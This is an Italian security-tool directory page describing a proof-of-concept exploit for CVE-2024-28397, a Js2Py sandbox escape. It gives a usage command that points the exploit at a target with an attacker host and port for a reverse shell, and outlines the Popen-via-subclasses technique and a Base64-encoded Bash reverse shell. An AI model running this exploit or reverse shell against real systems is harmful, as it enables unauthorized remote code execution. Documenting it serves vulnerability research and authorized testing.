Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-28397-Js2Py-RCE — Questo repository contiene una prova di concetto (PoC) per CVE-2024-28397, una vulnerabilità nella libreria js2py che consente una sandbox escape per ottenere l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Questo repository contiene una prova di concetto (PoC) per CVE-2024-28397, una vulnerabilità nella libreria js2py che consente una sandbox escape per ottenere l'esecuzione remota di codice.

Vedi Repository
211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-28397-Js2Py-RCE

Descrizione

Questo repository contiene una Proof of Concept (PoC) basata su Python per CVE-2024-28397, una vulnerabilità di sandbox escape nell'interprete JavaScript Js2Py per Python. Quando l'applicazione target valuta codice JS non attendibile tramite Js2Py, un attaccante può uscire dalla sandbox ed eseguire codice Python arbitrario. Questo può essere sfruttato per ottenere l'esecuzione remota di codice (RCE) e una reverse shell sul sistema vulnerabile.

Questo exploit è stato ispirato dal progetto CVE-2024-28397-js2py-Sandbox-Escape di Marven11.


Avvertenza

Questo script è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'uso non autorizzato di questo script contro sistemi di cui non si è proprietari o per i quali non si ha esplicita autorizzazione è illegale e non etico. L'autore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo script.


Informazioni sulla Vulnerabilità

  • CVE ID: CVE-2024-28397
  • Componente: sandbox escape di Js2Py
  • Impatto: accesso illimitato al modello a oggetti di Python tramite __class__.__base__.__subclasses__, con conseguente esecuzione arbitraria di codice
  • Vettore d'attacco: remoto (tramite interfaccia HTTP esposta che valuta JavaScript controllato dall'utente)

Caratteristiche

  • Invio automatico del payload della reverse shell tramite RCE in Python
  • Esecuzione inline di comandi shell codificati in Base64
  • Listener per reverse shell integrato con stabilizzazione PTY di base
  • Formattazione pulita dell'output
  • Leggero e senza dipendenze (tranne requests)

Requisiti

  • Python 3.x
  • Modulo requests (pip install requests)
  • Un sistema Linux (per la reverse shell /dev/tcp)
  • Un target che esegue un'implementazione vulnerabile di Js2Py

Utilizzo

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: L'URL completo dell'endpoint dell'app web vulnerabile
  • --lhost: Il tuo indirizzo IP locale (usato per la reverse shell)
  • --lport: La tua porta locale per ricevere la shell

Come funziona

  1. Lo script prepara una reverse shell Bash, la codifica in Base64 e la inietta in un payload JavaScript.
  2. Il payload JS attraversa l'albero degli oggetti Python usando __class__.__base__.__subclasses__() per trovare subprocess.Popen.
  3. Usa Popen per decodificare ed eseguire la shell.
  4. La macchina dell'attaccante riceve la reverse shell e la stabilizza automaticamente.
Scarica lo strumento